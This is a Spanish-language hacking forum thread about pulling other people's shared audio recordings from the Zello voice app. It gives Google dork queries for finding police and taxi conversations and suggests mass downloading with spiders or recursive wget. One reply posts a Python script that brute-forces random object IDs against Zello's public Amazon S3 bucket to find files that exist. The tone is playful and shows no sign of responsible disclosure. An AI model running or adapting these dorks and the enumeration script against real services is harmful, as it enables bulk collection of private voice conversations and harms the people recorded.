El caso de la red Zello o como intervenir comunicaciones en red social

Iniciado por Rootkit_Pentester, Julio 11, 2018, 05:02:05 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...

Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.

Dork PoC: site:zello.com/shared

68.000 audios y charlas de todo tipo, pero filtremos...

site:zello.com/shared/ policia

78 resultados entre ellos...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

O

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PoC Taxis:

site:zello.com/shared taxy

14000 resultados...

Algunos como:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.

"Dame un buscador y movere el mundo".


Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

se puede usar wget de forma recursiva
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Julio 11, 2018, 10:44:03 AM #4 Ultima modificación: Julio 11, 2018, 10:47:29 AM por Rootkit_Pentester
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los mp3 no vienen de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sino de un bucket de Amazon   ;D

Este es el Bucket xD: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
tendran 14 audios.

Saludos colegas :D

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los mp3 no vienen de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sino de un bucket de Amazon   ;D

Este es el Bucket xD: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.


Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
Código: python
import requests
import random

def random_string():

return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])

for x in range(500):

a = random_string()
req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
if req.status_code == 200:

print a + " existe.           - - - - - - - - - - - - -"

else:

print a + " no existe. -> " + str(req.status_code)


Y funciona tal que así.

Grande capo @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).